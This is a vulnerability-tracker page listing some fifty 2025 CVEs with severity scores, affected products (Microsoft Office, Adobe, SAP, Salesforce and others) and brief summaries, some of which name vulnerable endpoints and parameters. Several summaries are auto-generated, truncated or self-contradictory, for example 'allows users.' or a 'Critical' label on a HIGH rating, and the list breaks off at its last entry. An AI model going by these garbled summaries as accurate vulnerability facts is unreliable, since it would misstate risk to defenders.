490 CVEs tracked today. 15 Critical, 137 High, 321 Medium, 14 Low.
-
CVE-2025-49507
CRITICAL
CVSS 9.8
Critical deserialization of untrusted data vulnerability in LoftOcean CozyStay that enables object injection attacks. All versions before 1.7.1 are affected, allowing unauthenticated remote attackers to achieve complete system compromise (confidentiality, integrity, and availability impact) with no user interaction required. This is a network-exploitable vulnerability with CVSS 9.8 severity indicating maximum real-world risk.
Deserialization
-
CVE-2025-49455
CRITICAL
CVSS 9.8
Critical deserialization of untrusted data vulnerability in LoftOcean TinySalt that enables object injection attacks. This vulnerability affects TinySalt versions prior to 3.10.0 and allows unauthenticated remote attackers to achieve complete system compromise (confidentiality, integrity, and availability impact) with no user interaction required. The attack vector is network-based with low complexity, resulting in a CVSS 9.8 critical severity rating; exploitation status and POC availability cannot be confirmed from provided data, but the vulnerability's remote and unauthenticated nature suggests high real-world exploitability.
Deserialization
-
CVE-2025-47163
HIGH
CVSS 8.8
Critical deserialization vulnerability in Microsoft Office SharePoint that allows authenticated attackers to execute arbitrary code remotely without user interaction. The vulnerability affects SharePoint environments where untrusted data is deserialized, enabling network-based code execution with high impact to confidentiality, integrity, and availability. While no public exploit code has been confirmed in open intelligence sources, the CVSS 8.8 rating and low attack complexity suggest this is a high-priority patch for all affected organizations.
Microsoft
Office365
Deserialization
RCE
Sharepoint Enterprise Server
-
CVE-2025-43698
CRITICAL
CVSS 9.1
A remote code execution vulnerability (CVSS 9.1). Critical severity with potential for significant impact on affected systems.
Salesforce
Privilege Escalation
Information Disclosure
-
CVE-2025-42989
CRITICAL
CVSS 9.6
Privilege escalation vulnerability in RFC inbound processing that fails to enforce proper authorization checks for authenticated users, allowing attackers to escalate privileges and critically compromise application integrity and availability. The vulnerability affects authenticated users (PR:L) with network accessibility (AV:N) and has a critical CVSS score of 9.6; without access to KEV, EPSS, or POC data, assessment indicates high real-world risk due to the low attack complexity (AC:L) and cross-boundary impact (S:C) combined with authentication bypass in authorization logic.
Privilege Escalation
-
CVE-2025-40657
CRITICAL
CVSS 9.8
Critical unauthenticated SQL injection vulnerability in DM Corporative CMS affecting the /modules/forms/collectform.asp endpoint via the 'codform' parameter, allowing remote attackers to execute arbitrary SQL commands without authentication. This vulnerability enables complete database compromise including data exfiltration, modification, and deletion with a CVSS score of 9.8. The exploitation likelihood depends on patch availability and active threat actor interest, though the network-accessible nature and lack of authentication requirements make this a severe priority for affected organizations.
SQLi
Dm Corporative Cms
-
CVE-2025-40656
CRITICAL
CVSS 9.8
Critical SQL injection vulnerability in DM Corporative CMS that allows unauthenticated remote attackers to execute arbitrary SQL commands through the 'cod' parameter in the /administer/node-selection/data.asp endpoint. This enables complete database compromise including unauthorized retrieval, creation, modification, and deletion of data. With a CVSS score of 9.8 and network-based attack vector requiring no authentication or user interaction, this represents an extremely high-severity threat to all exposed instances; exploitation status and proof-of-concept availability should be verified against current KEV and EPSS data.
SQLi
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40655
CRITICAL
CVSS 9.8
Critical SQL injection vulnerability in DM Corporative CMS affecting the /antcatalogue.asp endpoint's 'name' parameter, allowing unauthenticated remote attackers to execute arbitrary SQL commands with complete database compromise (retrieval, creation, modification, deletion). With a CVSS 9.8 score, zero authentication requirements, and network-accessible attack surface, this vulnerability represents an immediate and severe risk to all exposed instances; exploitation likelihood is extremely high given the straightforward injection point and lack of input validation.
SQLi
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40654
CRITICAL
CVSS 9.8
A critical SQL injection vulnerability (CVE-2025-40654) exists in DM Corporative CMS affecting the /antbuspre.asp endpoint, where the 'name' and 'cod' parameters are not properly sanitized. This unauthenticated, network-accessible vulnerability allows remote attackers to execute arbitrary SQL commands, enabling complete database compromise including data exfiltration, modification, and destruction. With a CVSS 9.8 score and network-exploitable attack surface, this represents a critical production risk if DM Corporative CMS is internet-facing.
SQLi
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40585
CRITICAL
CVSS 9.9
Critical authentication bypass vulnerability affecting Energy Services products that use the G5DFR component, where default credentials allow unauthenticated remote attackers to gain full control and tamper with device outputs. The CVSS 9.9 score reflects the severe nature of this issue-no authentication required, network-accessible, with high integrity impact across system boundaries. This vulnerability poses an immediate threat to critical infrastructure and industrial control systems relying on Energy Services with G5DFR.
Authentication Bypass
Information Disclosure
-
CVE-2025-36852
CRITICAL
CVSS 9.4
CVE-2025-36852 is a security vulnerability (CVSS 9.4) that allows any contributor with pull request privileges. Critical severity with potential for significant impact on affected systems.
Authentication Bypass
Google
-
CVE-2025-33073
HIGH
CVSS 8.8
Windows SMB contains an improper access control vulnerability (CVE-2025-33073, CVSS 8.8) enabling authenticated attackers to escalate privileges over the network. KEV-listed with EPSS 57.6% and public PoC, this vulnerability in the core Windows file sharing protocol affects every Windows system on the network, enabling lateral movement from any compromised domain account to SYSTEM-level access on SMB-accessible systems.
Microsoft
Information Disclosure
Windows Server 2022
Windows 11 24h2
Windows 10 21h2
-
CVE-2025-33068
HIGH
CVSS 7.5
Windows Standards-Based Storage Management Service contains an uncontrolled resource consumption vulnerability allowing unauthenticated network attackers to cause denial of service. The service manages storage operations and its disruption affects storage provisioning and management on Windows servers.
Microsoft
Denial Of Service
Windows
Windows Server 2012
Windows Server 2019
-
CVE-2025-33053
HIGH
CVSS 8.8
Windows Internet Shortcut Files (.url) contain an external control vulnerability (CVE-2025-33053, CVSS 8.8) that enables remote code execution over a network. KEV-listed with EPSS 48.5% and public PoC, this vulnerability allows attackers to craft malicious .url files that execute arbitrary code when opened, bypassing the security restrictions normally applied to internet-sourced shortcut files.
Microsoft
Windows
RCE
Path Traversal
Windows Server 2016
-
CVE-2025-32724
HIGH
CVSS 7.5
Windows Local Security Authority Subsystem Service (LSASS) contains an uncontrolled resource consumption vulnerability that allows unauthenticated remote attackers to cause a denial of service. Crashing or degrading LSASS disrupts all authentication and authorization on the affected Windows server, effectively taking the system offline.
Microsoft
Authentication Bypass
Windows 10 21h2
Windows Server 2012
Windows 11 24h2
-
CVE-2025-30220
CRITICAL
CVSS 9.9
A remote code execution vulnerability in GeoServer (CVSS 9.9) that allows users. Risk factors: public PoC available. Vendor patch is available.
XXE
Geonetwork
Geotools
Geoserver
-
CVE-2025-27817
HIGH
CVSS 7.5
A SSRF vulnerability in A possible arbitrary file read and SSRF vulnerability (CVSS 7.5) that allows clients. Risk factors: EPSS 17% exploitation probability.
Apache
SSRF
Kafka
Redhat
Suse
-
CVE-2025-4653
HIGH
CVSS 7.0
OS command injection vulnerability in the backup name field of Pandora ITSM 5.0.105 that results from improper neutralization of special elements (CWE-77). An authenticated attacker with high privileges can inject arbitrary OS commands through the backup name parameter, potentially achieving code execution with high confidentiality impact. The CVSS 7.0 score reflects the requirement for privileged access (PR:H), but the network-accessible attack vector (AV:N) and low attack complexity (AC:L) indicate this is a practical threat in enterprise environments where administrative accounts may be compromised or abused.
Command Injection
-
CVE-2025-2474
CRITICAL
CVSS 9.8
A security vulnerability in the PCX image codec in QNX SDP (CVSS 9.8) that allows an unauthenticated attacker. Critical severity with potential for significant impact on affected systems.
Buffer Overflow
Qnx Software Development Platform
-
CVE-2025-1041
CRITICAL
CVSS 9.9
CVE-2025-1041 is a security vulnerability (CVSS 9.9) that allows an unauthorized remote command. Critical severity with potential for significant impact on affected systems.
Authentication Bypass
Call Management System
-
CVE-2024-57190
CRITICAL
CVSS 9.8
Erxes versions prior to 1.6.1 contain a critical authentication bypass vulnerability where attackers can impersonate any user by injecting arbitrary values into the 'User' HTTP header, gaining unauthorized access to all GraphQL endpoints. This CWE-284 (Incorrect Access Control) flaw requires no authentication credentials, no user interaction, and can be exploited over the network with trivial complexity, resulting in complete compromise of confidentiality, integrity, and availability (CVSS 9.8). The vulnerability likely has active exploitation potential given the simplicity of the attack vector and the critical nature of authentication bypass flaws in widely-deployed platforms.
Authentication Bypass
Erxes
-
CVE-2024-34711
CRITICAL
CVSS 9.3
CVE-2024-34711 is an improper URI validation vulnerability in GeoServer that allows unauthenticated attackers to bypass XML External Entity (XXE) filtering and perform information disclosure attacks against internal networks. The vulnerability affects GeoServer versions prior to 2.25.0, where a weak regex pattern in the PreventLocalEntityResolver class fails to adequately block malicious URIs, enabling attackers to make arbitrary HTTP requests and scan internal infrastructure. With a CVSS score of 9.3 and high exploitation probability, this vulnerability poses a significant risk for network reconnaissance and potential lateral movement attacks.
Authentication Bypass
Geoserver
-
CVE-2025-49511
HIGH
CVSS 7.1
Cross-Site Request Forgery (CSRF) vulnerability in uxper Civi Framework versions up to 2.1.6 that allows unauthenticated attackers to perform unauthorized actions on behalf of authenticated users. The vulnerability has a CVSS score of 7.1 (High) with high availability impact and integrity impact, though it requires user interaction (UI:R) to exploit. Without confirmed KEV status or EPSS data, the actual exploitation likelihood remains uncertain, but the network-accessible attack vector and low complexity suggest moderate real-world risk for organizations running affected Civi Framework versions.
CSRF
-
CVE-2025-49454
HIGH
CVSS 8.1
PHP Local File Inclusion (LFI) vulnerability in LoftOcean TinySalt versions before 3.10.0, caused by improper control of filenames in PHP include/require statements (CWE-98). An unauthenticated remote attacker can exploit this network-accessible vulnerability with moderate complexity to read arbitrary files, execute code, and potentially achieve remote code execution, though exploitation requires specific conditions due to high attack complexity. The vulnerability has not been confirmed as actively exploited in the wild (KEV status unknown), but represents a critical risk for exposed TinySalt installations.
PHP
Information Disclosure
-
CVE-2025-49142
HIGH
CVSS 7.1
A remote code execution vulnerability in Nautobot (CVSS 7.1). High severity vulnerability requiring prompt remediation. Vendor patch is available.
Python
Authentication Bypass
Nautobot
-
CVE-2025-47977
HIGH
CVSS 8.2
Cross-site scripting (XSS) vulnerability in the Nuance Digital Engagement Platform that allows unauthenticated attackers to inject malicious scripts into web pages generated by the platform. This vulnerability enables spoofing attacks and potential credential theft or session hijacking over the network with only user interaction required. With a CVSS score of 8.2 and network-accessible attack vector, this represents a significant risk to organizations deploying Nuance's engagement platform, particularly given the high impact on confidentiality and cross-site scope implications.
XSS
Nuance Digital Engagement Platform
-
CVE-2025-47968
HIGH
CVSS 7.8
CVE-2025-47968 is an improper input validation vulnerability in Microsoft AutoUpdate (MAU) that allows a locally authenticated attacker to achieve privilege escalation on affected systems. The vulnerability has a CVSS score of 7.8 (High), indicating significant impact with confidentiality, integrity, and availability compromise. Active exploitation status and proof-of-concept availability cannot be confirmed from provided data, but the local attack vector with low complexity and low privilege requirement suggests elevated real-world risk for multi-user or shared systems.
Microsoft
Apple
Privilege Escalation
Autoupdate
-
CVE-2025-47962
HIGH
CVSS 7.8
CVE-2025-47962 is an improper access control vulnerability in Windows SDK that allows an authenticated local attacker to escalate privileges without user interaction. The vulnerability affects Windows SDK components and presents a high risk due to its CVSS score of 7.8 (High severity) with high impact on confidentiality, integrity, and availability. While no active exploitation in the wild (KEV status) or public POC has been confirmed at this time, the low attack complexity and requirement for only local user privileges make this a significant priority for Windows environments.
Microsoft
Windows
Privilege Escalation
Windows Software Development Kit
-
CVE-2025-47957
HIGH
CVSS 8.4
Use-after-free vulnerability in Microsoft Office Word that allows local, unauthenticated attackers to execute arbitrary code with high privileges. The vulnerability affects Word processing functionality and requires no user interaction, making it a critical local privilege escalation vector. Without confirmed KEV status or public POC availability, real-world exploitation likelihood should be assessed against EPSS data and patch availability from Microsoft security advisories.
Use After Free
Microsoft
Windows
RCE
Office Long Term Servicing Channel
-
CVE-2025-47955
HIGH
CVSS 7.8
Privilege escalation vulnerability in Windows Remote Access Connection Manager that allows an authenticated local attacker to elevate privileges to a higher integrity level without user interaction. The vulnerability affects Windows systems with Remote Access Connection Manager enabled and has a CVSS score of 7.8 (High severity). While no active exploitation in the wild has been publicly confirmed at this time, the local attack vector combined with low complexity and no user interaction requirement makes this a significant risk for multi-user or compromised systems where an attacker already has local access.
Microsoft
Privilege Escalation
Windows
Windows Server 2022
Windows 10 1507
-
CVE-2025-47953
HIGH
CVSS 8.4
A security vulnerability in Use after free in Microsoft Office (CVSS 8.4) that allows an unauthorized attacker. High severity vulnerability requiring prompt remediation.
Microsoft
Use After Free
RCE
365 Apps
Office Long Term Servicing Channel
-
CVE-2025-47849
HIGH
CVSS 8.8
A privilege escalation vulnerability in Apache CloudStack (CVSS 8.8) that allows the attacker. High severity vulnerability requiring prompt remediation.
Apache
Privilege Escalation
Information Disclosure
Cloudstack
-
CVE-2025-47713
HIGH
CVSS 8.8
A privilege escalation vulnerability in Apache CloudStack (CVSS 8.8) that allows the attacker. High severity vulnerability requiring prompt remediation.
Apache
Privilege Escalation
Denial Of Service
Information Disclosure
Cloudstack
-
CVE-2025-47176
HIGH
CVSS 7.8
Local code execution vulnerability in Microsoft Office Outlook triggered by improper path traversal handling (CWE-35) in the '.../...//' sequence. Authorized users with local access can exploit this to execute arbitrary code with the privileges of the Outlook process, achieving high confidentiality, integrity, and availability impact. This vulnerability requires local access and existing user privileges but no user interaction, making it a significant risk for multi-user systems or compromised local accounts.
Microsoft
Outlook
Windows
RCE
365 Apps
-
CVE-2025-47175
HIGH
CVSS 7.8
Use-after-free vulnerability in Microsoft Office PowerPoint that allows an unauthenticated local attacker to execute arbitrary code with high integrity and confidentiality impact. The vulnerability requires user interaction (opening a malicious PowerPoint file) but no elevated privileges, making it accessible to standard user accounts. With a CVSS score of 7.8 and local attack vector, this represents a moderate-to-high severity risk for organizations where PowerPoint is widely deployed.
Microsoft
Denial Of Service
Office
Powerpoint
Office Long Term Servicing Channel
-
CVE-2025-47174
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in Microsoft Office Excel that allows local attackers to execute arbitrary code with high privileges (confidentiality, integrity, and availability impact). The vulnerability requires user interaction (opening a malicious Excel file) but no special privileges, making it a practical threat to Excel users. With a CVSS score of 7.8 and local attack vector, this represents a significant code execution risk for organizations relying on Excel for document processing.
Microsoft
Buffer Overflow
Windows
RCE
Office Long Term Servicing Channel
-
CVE-2025-47173
HIGH
CVSS 7.8
CVE-2025-47173 is an improper input validation vulnerability in Microsoft Office that allows local code execution without requiring user privileges, though user interaction is needed. An attacker with local access can craft a malicious Office document that, when opened by a user, executes arbitrary code with the privileges of the affected Office application. This vulnerability affects Microsoft Office products across multiple versions and poses a moderate-to-high risk given its local attack vector and high impact on confidentiality, integrity, and availability.
Microsoft
RCE
Windows
Office Long Term Servicing Channel
Office
-
CVE-2025-47172
HIGH
CVSS 8.8
SQL injection vulnerability in Microsoft Office SharePoint that allows authenticated attackers to execute arbitrary code remotely without user interaction. The vulnerability affects SharePoint deployments where an authorized user can craft malicious SQL commands through improperly neutralized input fields. This is a high-severity issue (CVSS 8.8) with significant confidentiality, integrity, and availability impact, particularly concerning given SharePoint's role as a critical enterprise collaboration platform.
Microsoft
SQLi
Exchange
RCE
Sharepoint Enterprise Server
-
CVE-2025-47170
HIGH
CVSS 7.8
Use-after-free vulnerability in Microsoft Office Word that allows local, unauthenticated attackers to execute arbitrary code with high impact (confidentiality, integrity, availability). The vulnerability requires user interaction (e.g., opening a malicious document) but has low attack complexity, making it a significant local code execution threat. Without confirmed KEV status or EPSS data provided, the CVSS 7.8 score indicates high severity, though real-world exploitability depends on whether public exploits or proofs-of-concept have emerged.
Microsoft
Denial Of Service
365 Apps
Office Long Term Servicing Channel
-
CVE-2025-47169
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in Microsoft Office Word that allows local, unauthenticated attackers to execute arbitrary code with high impact on confidentiality, integrity, and availability. The vulnerability requires user interaction (opening a malicious document) but no elevated privileges, making it a significant local code execution threat affecting Word users who open untrusted documents.
Microsoft
Buffer Overflow
Windows
RCE
Office
-
CVE-2025-47168
HIGH
CVSS 7.8
Use-after-free vulnerability in Microsoft Office Word that allows local, unauthenticated attackers to execute arbitrary code with high severity (CVSS 7.8). The vulnerability requires user interaction (opening a malicious document) but grants complete system compromise through code execution. This is a memory safety issue (CWE-416) in Word's document processing engine that could be actively exploited if public POC becomes available.
Use After Free
Microsoft
Windows
RCE
Office Long Term Servicing Channel
-
CVE-2025-47167
HIGH
CVSS 8.4
Type confusion vulnerability in Microsoft Office that allows unauthenticated local attackers to execute arbitrary code with high impact on confidentiality, integrity, and availability. The vulnerability exploits improper resource access due to incompatible type handling, requiring no user interaction or privileges. This is a critical local code execution vector affecting Microsoft Office installations.
Microsoft
Authentication Bypass
365 Apps
Office
Office Long Term Servicing Channel
-
CVE-2025-47166
HIGH
CVSS 8.8
Critical deserialization vulnerability in Microsoft Office SharePoint that allows authenticated attackers to execute arbitrary code remotely with high impact to confidentiality, integrity, and availability. The vulnerability affects SharePoint environments where an authorized user can submit malicious serialized objects, bypassing input validation due to unsafe deserialization practices (CWE-502). While the attack requires valid credentials (PR:L), the network-accessible attack vector (AV:N), low attack complexity (AC:L), and high CVSS score of 8.8 indicate significant real-world risk, particularly in organizations with broad internal user bases or federated access.
Microsoft
Deserialization
Exchange
RCE
Sharepoint Server
-
CVE-2025-47165
HIGH
CVSS 7.8
Use-after-free vulnerability in Microsoft Office Excel that allows local code execution with high severity (CVSS 7.8). An attacker with local access can trigger the vulnerability through user interaction (opening a malicious file) to execute arbitrary code with the privileges of the Excel process, potentially achieving full system compromise. No KEV status, active exploitation data, or public POC availability was confirmed in the provided dataset, but the high CVSS score and local attack vector indicate this requires prompt patching.
Use After Free
Microsoft
Windows
RCE
Excel
-
CVE-2025-47164
HIGH
CVSS 8.4
Use-after-free (UAF) vulnerability in Microsoft Office that allows unauthenticated local attackers to execute arbitrary code with no user interaction required. The vulnerability affects multiple Microsoft Office versions and has a CVSS score of 8.4 (High), indicating severe risk with high impact to confidentiality, integrity, and availability. Without publicly disclosed EPSS data or KEV confirmation provided, the actual exploitation likelihood in the wild remains unconfirmed, though the local attack vector and lack of privilege/interaction requirements suggest moderate real-world exploitability once weaponized.
Use After Free
Microsoft
RCE
Office
365 Apps
-
CVE-2025-47162
HIGH
CVSS 8.4
Heap-based buffer overflow vulnerability in Microsoft Office that allows unauthenticated local attackers to execute arbitrary code with high privileges. The vulnerability affects Microsoft Office products across multiple versions and requires no user interaction or special privileges to exploit. With a CVSS score of 8.4 and local attack vector, this represents a severe local privilege escalation and code execution risk; exploitation status and real-world activity should be verified against KEV catalogs and EPSS scoring.
Microsoft
Buffer Overflow
RCE
Windows
Office Long Term Servicing Channel
-
CVE-2025-47110
HIGH
CVSS 8.4
Adobe Commerce versions 2.4.8 and earlier contain a stored Cross-Site Scripting (XSS) vulnerability (CVE-2025-47110, CVSS 8.4) in form field validation that allows high-privileged attackers to inject malicious JavaScript into the application. When other high-privileged users view pages containing the injected payload, the malicious script executes in their browser context, potentially compromising confidentiality, integrity, and availability across multiple privileged accounts. The vulnerability requires high privileges to exploit but affects other high-privileged users, making it a significant concern in multi-admin environments.
Adobe
XSS
Privilege Escalation
Magento
Commerce
-
CVE-2025-47108
HIGH
CVSS 7.8
CVE-2025-47108 is an out-of-bounds write vulnerability in Adobe Substance3D Painter versions 11.0.1 and earlier that allows arbitrary code execution with user-level privileges. The vulnerability requires user interaction-specifically opening a malicious file-making it a file-based attack vector. While no CVSS:3.1 score of 7.8 indicates high severity with local attack surface, exploitation depends on social engineering to deliver the malicious file.
Buffer Overflow
RCE
Adobe
Substance 3d Painter
-
CVE-2025-47107
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in Adobe InCopy versions 20.2, 19.5.3 and earlier that allows arbitrary code execution with the privileges of the current user. The vulnerability requires user interaction (opening a malicious file) and presents a high-severity risk due to its direct code execution capability; exploitation likelihood and real-world attack status cannot be fully assessed without KEV confirmation or public POC availability.
Buffer Overflow
RCE
Adobe
Incopy
-
CVE-2025-46840
HIGH
CVSS 8.7
CVE-2025-46840 is an Improper Authorization vulnerability in Adobe Experience Manager (AEM) versions 6.5.22 and earlier that allows low-privileged attackers to escalate privileges and bypass security controls, potentially achieving session takeover. The vulnerability requires user interaction and has a CVSS score of 8.7 with high confidentiality and integrity impact. While no active exploitation in the wild (KEV status) or public proof-of-concept is currently documented, the network-accessible attack vector and low attack complexity combined with privilege escalation capabilities make this a high-priority patch candidate for organizations running affected AEM instances.
Adobe
Privilege Escalation
Authentication Bypass
Experience Manager
-
CVE-2025-46837
HIGH
CVSS 8.7
Adobe Experience Manager (AEM) versions 6.5.22 and earlier contain a reflected Cross-Site Scripting (XSS) vulnerability in form field handling that allows low-privileged attackers to inject malicious JavaScript. When a victim visits a page containing the vulnerable field with attacker-controlled input, the script executes in their browser context, enabling session hijacking and credential theft. The vulnerability has a CVSS score of 8.7 (High) and requires user interaction but no special privileges beyond basic AEM access.
Adobe
XSS
Information Disclosure
Experience Manager
-
CVE-2025-46612
HIGH
CVSS 7.2
CVE-2025-46612 is an unrestricted file upload vulnerability in Airleader Master and Easy versions prior to 6.36 that allows authenticated administrators to execute arbitrary commands on the server via malicious JSP file uploads through the Panel Designer dashboard. While requiring high-privilege credentials (administrator login), the vulnerability is particularly dangerous due to weak default credentials and the ease of exploitation. No active KEV designation or widespread POC availability has been confirmed, but the straightforward attack vector and high impact make this a significant priority for organizations using affected versions.
File Upload
Easy Firmware
-
CVE-2025-44044
HIGH
CVSS 7.5
Keyoti SearchUnit versions prior to 9.0.0 contain an XML External Entity (XXE) injection vulnerability that allows unauthenticated remote attackers to exfiltrate sensitive files from affected systems. The vulnerability has a CVSS 3.1 score of 7.5 (High) with a network attack vector, no privileges required, and no user interaction needed. While no public POC or active in-the-wild exploitation has been widely documented, the straightforward attack vector and high confidentiality impact make this a significant risk for organizations running vulnerable SearchUnit instances.
XXE
-
CVE-2025-43701
HIGH
CVSS 7.5
CVE-2025-43701 is an Improper Preservation of Permissions vulnerability in Salesforce OmniStudio FlexCards that allows unauthenticated network attackers to read Custom Settings data without authorization. Affecting OmniStudio versions before 254, this high-severity flaw (CVSS 7.5) enables direct exposure of sensitive configuration data through a low-complexity attack requiring no user interaction or privileges. While KEV status and active exploitation details are not available in provided data, the combination of high CVSS score, unauthenticated attack vector, and direct confidentiality impact indicates significant real-world risk to Salesforce deployments storing sensitive configuration in Custom Settings.
Information Disclosure
Salesforce
Privilege Escalation
-
CVE-2025-43700
HIGH
CVSS 7.5
CVE-2025-43700 is an Improper Preservation of Permissions vulnerability in Salesforce OmniStudio FlexCards that allows unauthenticated network-based attackers to expose encrypted data without requiring user interaction. This high-impact confidentiality breach (CVSS 7.5) affects OmniStudio versions prior to Spring 2025 release and represents a significant risk to organizations using FlexCards for sensitive data handling, particularly given the low attack complexity and absence of privilege requirements.
Information Disclosure
Salesforce
Privilege Escalation
-
CVE-2025-43697
HIGH
CVSS 7.5
Improper Preservation of Permissions vulnerability in Salesforce OmniStudio's DataMapper component that allows unauthenticated network-based attackers to expose encrypted data without requiring user interaction. The vulnerability affects OmniStudio versions prior to Spring 2025 and carries a CVSS 7.5 (High) severity rating. While specific KEV status and EPSS data were not provided in the intelligence sources, the high CVSS score combined with unauthenticated access (AV:N, PR:N) indicates this is a significant exposure risk for organizations using affected OmniStudio deployments.
Information Disclosure
Salesforce
Privilege Escalation
-
CVE-2025-43593
HIGH
CVSS 7.8
CVE-2025-43593 is an out-of-bounds write vulnerability in Adobe InDesign Desktop that enables arbitrary code execution with high severity (CVSS 7.8). Affected versions include ID20.2, ID19.5.3 and earlier on local systems. Exploitation requires user interaction (opening a malicious file), but once triggered, grants full code execution capabilities in the context of the current user. Current KEV and EPSS status unknown from provided data, but the local attack vector combined with user interaction requirement and high CVSS score indicates moderate-to-high real-world risk for targeted attacks against design professionals.
Buffer Overflow
RCE
Adobe
Indesign
-
CVE-2025-43590
HIGH
CVSS 7.8
CVE-2025-43590 is an out-of-bounds write vulnerability in Adobe InDesign Desktop that allows arbitrary code execution with the privileges of the current user. Affected versions include ID20.2, ID19.5.3, and earlier releases. Exploitation requires user interaction-specifically opening a malicious file-but once triggered, grants an attacker full code execution capabilities in the context of the authenticated user.
Buffer Overflow
RCE
Adobe
Indesign
-
CVE-2025-43589
HIGH
CVSS 7.8
Use-after-free vulnerability in Adobe InDesign Desktop that allows arbitrary code execution with the privileges of the current user. Affected versions are InDesign ID20.2, ID19.5.3, and earlier; exploitation requires a victim to open a malicious file. This is a high-severity local vulnerability with user interaction required, but without confirmed active exploitation data or public POC availability indicated in the provided intelligence.
Use After Free
RCE
Adobe
Indesign
-
CVE-2025-43588
HIGH
CVSS 7.8
A remote code execution vulnerability (CVSS 7.8). High severity vulnerability requiring prompt remediation.
Buffer Overflow
RCE
Adobe
Substance 3d Sampler
-
CVE-2025-43586
HIGH
CVSS 8.1
A remote code execution vulnerability (CVSS 8.1). High severity vulnerability requiring prompt remediation.
Adobe
Privilege Escalation
Commerce
Commerce B2b
Magento
-
CVE-2025-43585
HIGH
CVSS 8.2
Adobe Commerce versions 2.4.8 and earlier contain an improper authorization vulnerability (CWE-285) that allows unauthenticated attackers to bypass security features and gain unauthorized access to sensitive functionality. This vulnerability has a high integrity impact and can be exploited remotely without user interaction, making it a critical priority for Adobe Commerce administrators. The 8.2 CVSS score combined with the network-accessible attack vector and lack of authentication requirements indicates significant real-world risk.
Adobe
Authentication Bypass
PHP
Magento
Commerce B2b
-
CVE-2025-43581
HIGH
CVSS 7.8
CVE-2025-43581 is an out-of-bounds write vulnerability in Adobe Substance3D - Sampler (versions 5.0 and earlier) that enables arbitrary code execution within the current user's security context. The vulnerability requires user interaction-specifically opening a malicious file-making it a file-based attack vector. With a CVSS score of 7.8 and high impact ratings for confidentiality, integrity, and availability, this represents a significant local privilege escalation risk for affected users, though exploitation requires social engineering or file delivery mechanisms.
Buffer Overflow
RCE
Substance 3d Sampler
-
CVE-2025-43577
HIGH
CVSS 7.8
Use After Free (UAF) vulnerability in Adobe Acrobat Reader that allows arbitrary code execution with the privileges of the current user. Affected versions include 24.001.30235, 20.005.30763, 25.001.20521 and earlier across multiple release tracks. Exploitation requires user interaction (opening a malicious PDF file), but the high CVSS score of 7.8 and local attack vector indicate significant real-world risk; KEV and active exploitation status should be confirmed from official sources.
RCE
Adobe
Use After Free
Acrobat
Acrobat Dc
-
CVE-2025-43576
HIGH
CVSS 7.8
A remote code execution vulnerability (CVSS 7.8). High severity vulnerability requiring prompt remediation.
RCE
Adobe
Denial Of Service
Acrobat Reader Dc
Acrobat
-
CVE-2025-43575
HIGH
CVSS 7.8
CVE-2025-43575 is an out-of-bounds write vulnerability in Adobe Acrobat Reader that enables arbitrary code execution with high integrity and confidentiality impact. Affected versions include 24.001.30235, 20.005.30763, 25.001.20521 and earlier across multiple product lines. Exploitation requires user interaction (opening a malicious PDF), but once triggered, allows code execution in the context of the current user with no privilege elevation needed.
Buffer Overflow
Adobe
RCE
Acrobat Dc
Acrobat
-
CVE-2025-43574
HIGH
CVSS 7.8
Use After Free (UAF) vulnerability in Adobe Acrobat Reader affecting versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier that enables arbitrary code execution with the privileges of the current user. The vulnerability requires user interaction (opening a malicious PDF file) but has a high CVSS score of 7.8 due to the severity of potential code execution impact. Without confirmed KEV listing or public POC data provided, this represents a significant but not yet confirmed active threat.
RCE
Adobe
Use After Free
Acrobat Dc
Acrobat
-
CVE-2025-43573
HIGH
CVSS 7.8
Use After Free (UAF) vulnerability in Adobe Acrobat Reader that enables arbitrary code execution with high privilege context on affected systems. The vulnerability impacts multiple versions across different release branches (24.001.30235, 20.005.30763, 25.001.20521 and earlier), requiring only user interaction to trigger exploitation via malicious PDF files. With a CVSS score of 7.8 and no privilege escalation required, this represents a significant risk to enterprise and consumer users relying on Acrobat Reader for document handling.
RCE
Adobe
Use After Free
Acrobat Reader Dc
Acrobat Reader
-
CVE-2025-43558
HIGH
CVSS 7.8
A remote code execution vulnerability (CVSS 7.8). High severity vulnerability requiring prompt remediation.
Buffer Overflow
RCE
Adobe
Indesign
-
CVE-2025-43550
HIGH
CVSS 7.8
Use After Free vulnerability in Adobe Acrobat Reader that enables arbitrary code execution with user-level privileges when a victim opens a malicious PDF file. Affected versions include 24.001.30235, 20.005.30763, 25.001.20521 and earlier across multiple product lines. This vulnerability requires user interaction but presents high severity due to memory corruption leading to code execution, with exploitation probability and active exploitation status dependent on available public exploits.
RCE
Adobe
Use After Free
Acrobat Reader
Acrobat Dc
-
CVE-2025-42995
HIGH
CVSS 7.5
Denial-of-service vulnerability in SAP MDM Server's Read function that allows unauthenticated network attackers to trigger memory read access violations by sending specially crafted packets, causing the server process to crash and become unavailable. The vulnerability affects SAP MDM Server with a CVSS score of 7.5 (high severity) but is limited to availability impact with no confidentiality or integrity compromise. Status of active exploitation (KEV) and proof-of-concept availability are not specified in available intelligence.
Sap
Denial Of Service
Memory Corruption
-
CVE-2025-42994
HIGH
CVSS 7.5
Denial-of-service vulnerability in SAP MDM Server's ReadString function that allows unauthenticated remote attackers to trigger memory read access violations causing unexpected server process termination. The vulnerability affects SAP Master Data Management (MDM) Server and has a CVSS score of 7.5 with high availability impact; no confidentiality or integrity compromise occurs. This is a network-accessible denial-of-service vector with low attack complexity and no authentication requirements, making it a significant availability risk for organizations deploying SAP MDM infrastructure.
Sap
Denial Of Service
Memory Corruption
-
CVE-2025-42983
HIGH
CVSS 8.5
High-severity authentication bypass vulnerability in SAP Business Warehouse and SAP Plug-In Basis that allows authenticated attackers to drop arbitrary database tables, resulting in data loss or system unavailability. The vulnerability requires valid credentials but no user interaction, affecting systems across the network with a CVSS score of 8.5. While integrity impact is limited (attacker cannot read data), availability impact is severe, making this a critical integrity and availability threat for SAP deployments.
Sap
Denial Of Service
Privilege Escalation
-
CVE-2025-42982
HIGH
CVSS 8.8
